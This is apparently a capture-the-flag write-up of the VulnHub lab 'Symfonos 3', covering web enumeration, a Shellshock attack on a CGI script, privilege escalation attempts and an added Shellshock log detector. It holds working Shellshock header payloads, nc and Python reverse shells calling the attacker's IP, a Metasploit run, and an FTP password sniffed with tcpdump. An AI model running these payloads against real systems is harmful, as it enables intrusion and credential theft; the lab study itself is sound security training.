INFO
Name : Symfonos 3
Difficulty : Intermediate
Type : boot2root
Source : VulnHub
URL : https://www.vulnhub.com/entry/symfonos-3,332/
Entry : 9 / 35
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I'm using both VMware Workstation and VirtualBox (depending on the condition of the image) to host Kali and the Symfonos: 3 image, with both VMs on a NAT network (sometimes bridged). The previous Symfonos box was run on Workstation; this time I tried VirtualBox.
0. DISCOVERY
: netdiscover
Currently scanning: 192.168.22.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.10.1 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.2 52:54:00:12:35:00 1 60 Unknown vendor
192.168.10.3 08:00:27:d1:c4:7a 1 60 PCS Systemtechnik GmbH
192.168.10.22 08:00:27:87:09:0c 1 60 PCS Systemtechnik GmbH
1. SCANNING
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Tried to log in to FTP as the anonymous user, but it failed.
2. WEB ENUMERATION & RECONNAISSANCE
by using [nikto : dirb : wfuzz : gobuster : curl]
┌──(root💀takudaddy)-[~]
└─# curl -v http://192.168.10.22
* Trying 192.168.10.22:80...
* Connected to 192.168.10.22 (192.168.10.22) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.10.22
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 28 Mar 2021 12:11:35 GMT
< Server: Apache/2.4.25 (Debian)
< Last-Modified: Sat, 20 Jul 2019 05:19:54 GMT
< ETag: "f1-58e15fe4052c8"
< Accept-Ranges: bytes
< Content-Length: 241
< Vary: Accept-Encoding
< Content-Type: text/html
<
<html>
<head>
<style>
html,body{
margin:0;
height:100%;
}
img{
display:block;
width:100%; height:100%;
object-fit: cover;
}
</style>
</head>
<body>
<img src="image.jpg">
<!-- Can you bust the underworld? -->
</body>
</html>
* Connection #0 to host 192.168.10.22 left intact
'can you bust the underworld?'
┌──(root💀takudaddy)-[/usr/share/wordlists/dirb]
└─# gobuster dir -f -t 50 -x html -u http://192.168.10.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:15:10 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 241]
/icons/ (Status: 403) [Size: 278]
/cgi-bin/ (Status: 403) [Size: 278]
/gate/ (Status: 200) [Size: 202]
/server-status/ (Status: 403) [Size: 278]
===============================================================
2021/03/29 09:15:44 Finished
===============================================================
---- Scanning URL: http://192.168.10.22/ ----
+ http://192.168.10.22/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.10.22/gate/
+ http://192.168.10.22/index.html (CODE:200|SIZE:241)
+ http://192.168.10.22/server-status (CODE:403|SIZE:278)
---- Entering directory: http://192.168.10.22/gate/ ----
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.22/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000367: 301 9 L 28 W 313 Ch "gate"
: nothing interesting
# tried to find hidden directories for '/gate'
by using dirb, wfuzz and gobuster
┌──(root💀takudaddy)-[/attack]
└─# gobuster dir -f -t 50 -x html -u http://192.168.10.22/gate -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22/gate
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:29:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 202]
/cerberus/ (Status: 200) [Size: 202]
===============================================================
2021/03/29 09:29:54 Finished
===============================================================
: FOUND '/cerberus'
: but nothing interesting
# tried to find hidden directories for '/cgi-bin' (just in case)
by using dirb and wfuzz and gobuster
[ Running ] GOBUSTER is BURSTING against 192.168.10.22/cgi-bin
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.22/cgi-bin
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2021/03/29 09:20:12 Starting gobuster in directory enumeration mode
===============================================================
/underworld/ (Status: 200) [Size: 63]
===============================================================
2021/03/29 09:20:47 Finished
===============================================================
: FOUND '/underworld'
The time changes every time I refresh.
Examining this URL with curl shows something rather simple:
┌──(root💀takudaddy)-[/attack]
└─# curl -v 192.168.10.22/cgi-bin/underworld
* Trying 192.168.10.22:80...
* Connected to 192.168.10.22 (192.168.10.22) port 80 (#0)
> GET /cgi-bin/underworld HTTP/1.1
> Host: 192.168.10.22
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 29 Mar 2021 00:44:13 GMT
< Server: Apache/2.4.25 (Debian)
< Content-Length: 63
< Content-Type: text/html
<
19:44:13 up 54 min, 0 users, load average: 2.90, 2.86, 2.06
* Connection #0 to host 192.168.10.22 left intact
It's the output of the 'uptime' command!
┌──(root💀takudaddy)-[/attack]
└─# uptime
09:46:38 up 58 min, 1 user, load average: 0.07, 0.16, 0.14
3. EXPLOITATION / DOWN THE RABBIT HOLE
Let's check whether it's vulnerable.
┌──(root💀takudaddy)-[/attack]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://192.168.10.22/cgi-bin/underworld
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
┌──(root💀takudaddy)-[/attack]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.10.22/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false
It prints fine.
Username: cerberus
(Just in case, I leave a hydra brute force running and carry on with other work.)
This kind of vulnerability is called Shellshock Remote Command Injection: a vulnerability in GNU Bash, the shell used mainly on Linux-family operating systems, that lets an attacker execute system commands remotely.
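As an added defensive example (not part of the original write-up), a small Python detector for the Shellshock pattern the requests above carry: it flags bash function definitions in raw request headers and in Apache combined-format access log fields. The log lines and the request are constructed samples; the fix for the box itself is the patched bash package (CVE-2014-6271 family), and the detector only helps spot probes against CGI endpoints.

```python
import re

# mod_cgi exports request headers to the CGI process as environment variables,
# and an unpatched bash executes a value that starts with a function definition.
# The "() {" marker (whitespace varies between probes) is the tell-tale.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format; Referer and User-Agent are the usual carriers
# because they are attacker-controlled and logged verbatim.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def scan_header_block(raw_request):
    """Return the names of request headers whose value starts a bash function."""
    hits = []
    for line in raw_request.splitlines():
        if ":" not in line:          # request line or blank line
            continue
        name, value = line.split(":", 1)
        if SHELLSHOCK_RE.search(value):
            hits.append(name.strip())
    return hits

def scan_access_log(lines):
    """Return (client_ip, request_line, field) for each suspicious log entry."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:                    # not combined format: skip rather than guess
            continue
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append((m.group("ip"), m.group("req"), field))
                break
    return findings

# Constructed sample data (not captured from the box): a clean curl hit, a probe
# in the User-Agent, a probe in the Referer, and an ordinary browser request.
SAMPLE_LOG = [
    '192.168.10.10 - - [29/Mar/2021:09:46:38 +0900] "GET /cgi-bin/underworld HTTP/1.1" 200 63 "-" "curl/7.74.0"',
    '192.168.10.10 - - [29/Mar/2021:09:47:02 +0900] "GET /cgi-bin/underworld HTTP/1.1" 200 63 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '192.168.10.10 - - [29/Mar/2021:09:47:30 +0900] "GET /cgi-bin/underworld HTTP/1.1" 200 63 "() {:;}; /bin/true" "Mozilla/5.0"',
    '192.168.10.10 - - [29/Mar/2021:09:48:00 +0900] "GET /index.html HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Constructed raw request, mirroring the curl call shown in the write-up.
SAMPLE_REQUEST = (
    "GET /cgi-bin/underworld HTTP/1.1\r\n"
    "Host: 192.168.10.22\r\n"
    "User-Agent: () { :; }; echo; echo; /bin/bash -c 'id'\r\n"
    "Accept: */*\r\n"
)

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG), scan_header_block(SAMPLE_REQUEST))
```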
Quickly check whether nc is present, and use it if it is.
┌──(root💀takudaddy)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" http://192.168.10.22/cgi-bin/underworld
/bin/nc
It's there!
In that case the brute force is pointless, so stop it and connect with nc.
Open another terminal and start a listener:
┌──(root💀takudaddy)-[~]
└─# nc -lvp 7979
listening on [any] 7979 ...
Then launch nc on the target side:
/bin/nc -e /bin/bash 192.168.10.10 7979
┌──(root💀takudaddy)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/nc -e /bin/bash 192.168.10.10 7979'" http://192.168.10.22/cgi-bin/underworld
Got in!
┌──(root💀takudaddy)-[~]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.22: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.22] 42056
id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
For reference, shellshock = a CGI vulnerability. To do the same with msfconsole:
┌──(root💀takudaddy)-[/attack]
└─# msfconsole -q
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.10.22
RHOST => 192.168.10.22
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.10.10
LHOST => 192.168.10.10
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/underworld
targeturi => /cgi-bin/underworld
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.10:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 192.168.10.22
[*] Meterpreter session 1 opened (192.168.10.10:4444 -> 192.168.10.22:44422) at 2021-03-29 12:01:57 +0900
id
meterpreter >
meterpreter > shell
Process 13629 created.
Channel 1 created.
id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
4. POST EXPLOITATION
cerberus@symfonos3:/usr/lib/cgi-bin$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/exim4
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/umount
/bin/mount
/bin/ping
/bin/su
cerberus@symfonos3:/usr/lib/cgi-bin$ cd /home
cd /home
cerberus@symfonos3:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 20 2019 .
drwxr-xr-x 22 root root 4096 Jul 19 2019 ..
drwxr-xr-x 2 cerberus cerberus 4096 Jul 20 2019 cerberus
drwxr-xr-x 3 hades hades 4096 Apr 6 2020 hades
cerberus@symfonos3:/home$ cd hades
cd hades
cerberus@symfonos3:/home/hades$ ls -al
ls -al
total 28
drwxr-xr-x 3 hades hades 4096 Apr 6 2020 .
drwxr-xr-x 4 root root 4096 Jul 20 2019 ..
lrwxrwxrwx 1 root root 9 Jul 20 2019 .bash_history -> /dev/null
-rw-r--r-- 1 hades hades 220 Jul 19 2019 .bash_logout
-rw-r--r-- 1 hades hades 3526 Jul 19 2019 .bashrc
drwxr-xr-x 2 hades hades 4096 Jul 20 2019 .nano
-rw-r--r-- 1 hades hades 675 Jul 19 2019 .profile
-rw-r--r-- 1 hades hades 165 Apr 6 2020 .wget-hsts
cerberus@symfonos3:/home/hades$ find / -user hades 2>/dev/null
find / -user hades 2>/dev/null
/srv/ftp
/srv/ftp/statuscheck.txt
/home/hades
/home/hades/.bashrc
/home/hades/.profile
/home/hades/.bash_logout
/home/hades/.wget-hsts
/home/hades/.nano
/proc/664
/proc/664/task
/proc/664/task/664
/proc/664/task/664/net
/proc/664/task/664/attr
/proc/664/net
/proc/664/attr
cerberus@symfonos3:/var/www/html$ find . -type d
find . -type d
.
./gate
./gate/cerberus
./gate/cerberus/tartarus
./gate/cerberus/tartarus/titanomachy
./gate/cerberus/tartarus/hecatoncheires
./gate/cerberus/tartarus/thejudges
./gate/cerberus/tartarus/hermes
./gate/cerberus/tartarus/phlegethon
./gate/cerberus/tartarus/charon
./gate/cerberus/tartarus/cocytus
./gate/cerberus/tartarus/acheron
cerberus@symfonos3:/var/www/html$
I searched here and there but got nothing useful.
All is vain.
Scanning the commands run by users with a tool called pspy:
hades@symfonos3:/srv/ftp$ cd /tmp
hades@symfonos3:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
--2021-03-28 23:51:11-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
Resolving github.com (github.com)... 52.78.231.108
Connecting to github.com (github.com)|52.78.231.108|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-releases.githubusercontent.com/120821432/d4b68b80-c51c-11e9-8159-312abf23fd4b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210329T045112Z&X-Amz-Expires=300&X-Amz-Signature=1f87fd1777c5bc9993f3ae92c7621542ef0a1f5697e6de7c03a5c52e3e81eac2&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy32&response-content-type=application%2Foctet-stream [following]
--2021-03-28 23:51:12-- https://github-releases.githubusercontent.com/120821432/d4b68b80-c51c-11e9-8159-312abf23fd4b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210329T045112Z&X-Amz-Expires=300&X-Amz-Signature=1f87fd1777c5bc9993f3ae92c7621542ef0a1f5697e6de7c03a5c52e3e81eac2&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy32&response-content-type=application%2Foctet-stream
Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.109.154, 185.199.110.154, 185.199.108.154, ...
Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.109.154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2656352 (2.5M) [application/octet-stream]
Saving to: ‘pspy32’
pspy32 100%[===============================================>] 2.53M 4.98MB/s in 0.5s
2021-03-28 23:51:13 (4.98 MB/s) - ‘pspy32’ saved [2656352/2656352]
hades@symfonos3:/tmp$ chmod +x pspy32
hades@symfonos3:/tmp$ ./pspy
-bash: ./pspy: No such file or directory
hades@symfonos3:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
opt/ftpclient/ftpclient.py
Hmm..
I confirmed that tcpdump is installed on the target server. I'll use it to look at the traffic on lo (the loopback interface).
There are two ways:
print it directly, or
write it to a file, copy it to our side and examine it in Wireshark.
For practice, I'll do both.
Direct output:
localhost.ftp > localhost.56690: Flags [P.], cksum 0xfe5f (incorrect -> 0x7156), seq 1:56, ack 1, win 342, options [nop,nop,TS val 18212 ecr 18212], length 55: FTP, length: 55
220 ProFTPD 1.3.5b Server (Debian) [::ffff:127.0.0.1]
22:26:01.972459 IP (tos 0x0, ttl 64, id 52482, offset 0, flags [DF], proto TCP (6), length 52)
localhost.56690 > localhost.ftp: Flags [.], cksum 0xfe28 (incorrect -> 0x1e7f), ack 56, win 342, options [nop,nop,TS val 18212 ecr 18212], length 0
22:26:01.972520 IP (tos 0x0, ttl 64, id 52483, offset 0, flags [DF], proto TCP (6), length 64)
localhost.56690 > localhost.ftp: Flags [P.], cksum 0xfe34 (incorrect -> 0x8f7b), seq 1:13, ack 56, win 342, options [nop,nop,TS val 18212 ecr 18212], length 12: FTP, length: 12
USER hades
22:26:01.972523 IP (tos 0x0, ttl 64, id 49092, offset 0, flags [DF], proto TCP (6), length 52)
localhost.ftp > localhost.56690: Flags [.], cksum 0xfe28 (incorrect -> 0x1e73), ack 13, win 342, options [nop,nop,TS val 18212 ecr 18212], length 0
22:26:01.985170 IP (tos 0x0, ttl 64, id 49093, offset 0, flags [DF], proto TCP (6), length 85)
localhost.ftp > localhost.56690: Flags [P.], cksum 0xfe49 (incorrect -> 0x1813), seq 56:89, ack 13, win 342, options [nop,nop,TS val 18216 ecr 18212], length 33: FTP, length: 33
331 Password required for hades
22:26:01.985315 IP (tos 0x0, ttl 64, id 52484, offset 0, flags [DF], proto TCP (6), length 75)
localhost.56690 > localhost.ftp: Flags [P.], cksum 0xfe3f (incorrect -> 0x7c88), seq 13:36, ack 89, win 342, options [nop,nop,TS val 18216 ecr 18216], length 23: FTP, length: 23
PASS PTpZTfU4vxgzvRBE
Saving to a file, copying it over and checking it in Wireshark:
1. Capture to a file and start a server
cerberus@symfonos3:/tmp$ tcpdump -w result.pcap -i lo
tcpdump -w result.pcap -i lo
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
cerberus@symfonos3:/tmp$ ls
ls
result.pcap
cerberus@symfonos3:/tmp$ python -m SimpleHTTPServer 8888
python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
2. Fetch it with wget from the attacking side
┌──(root💀takudaddy)-[/attack]
└─# wget http://192.168.10.24:8888/result.pcap
--2021-03-29 12:45:10-- http://192.168.10.24:8888/result.pcap
Connecting to 192.168.10.24:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8192 (8.0K) [application/vnd.tcpdump.pcap]
Saving to: ‘result.pcap’
result.pcap 100%[==========================>] 8.00K --.-KB/s in 0s
2021-03-29 12:45:10 (1.84 GB/s) - ‘result.pcap’ saved [8192/8192]
hades user's password : PTpZTfU4vxgzvRBE
Let's log in as hades.
cerberus@symfonos3:/usr/lib/cgi-bin$ su hades
su hades
Password: PTpZTfU4vxgzvRBE
hades@symfonos3:/usr/lib/cgi-bin$
hades@symfonos3:/usr/lib/cgi-bin$ id
id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)
hades@symfonos3:~$ cd /opt/ftpclient
hades@symfonos3:/opt/ftpclient$ ls -al
ls -al
total 16
drwxr-x--- 2 root hades 4096 Apr 6 2020 .
drwxr-xr-x 3 root root 4096 Jul 20 2019 ..
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
-rw-r--r-- 1 root hades 251 Mar 28 22:55 statuscheck.txt
hades@symfonos3:/opt/ftpclient$ cat statuscheck.txt
cat statuscheck.txt
HTTP/1.1 200 OK
Date: Mon, 29 Mar 2021 03:53:01 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 20 Jul 2019 05:19:54 GMT
ETag: "f1-58e15fe4052c8"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding
Content-Type: text/html
hades@symfonos3:/opt/ftpclient$ ./ftpclient.py
./ftpclient.py
bash: ./ftpclient.py: Permission denied
hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
cat ftpclient.py
import ftplib
ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')
ftp.cwd('/srv/ftp/')
def upload():
    filename = '/opt/client/statuscheck.txt'
    ftp.storbinary('STOR '+filename, open(filename, 'rb'))
    ftp.quit()
upload()
hades@symfonos3:/opt/ftpclient$
5. PRIVILEGE ESCALATION
I couldn't get any further, so I looked it up: on the servers other people solved, the /opt/ftpclient directory is owned by hades.
But on the server I got, it is root / hades, so the ftpclient.py file cannot be modified.
hades@symfonos3:/opt/ftpclient$ ls -al
ls -al
total 16
drwxr-x--- 2 root hades 4096 Apr 6 2020 .
drwxr-xr-x 3 root root 4096 Jul 20 2019 ..
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
hades@symfonos3:~$ find / -writable -type d 2>/dev/null
/srv/ftp
/usr/lib/python2.7
/dev/mqueue
Searching for writable directories also turned up nothing for this file.
If it had been possible:
create a payload with the same name as the file above, replace the original file with it, start a listener and wait, and you get a connection as root.
I wrestled with it for half a day looking for another way but didn't find one; the important part has been learned, so I'll stop here.
Below are two sample payloads.
Sample 1:
import os
import sys
os.system("nc -e /bin/bash 192.168.10.10 8989")

Sample 2:
import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.10",8989))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
Below is the flag image:
The end.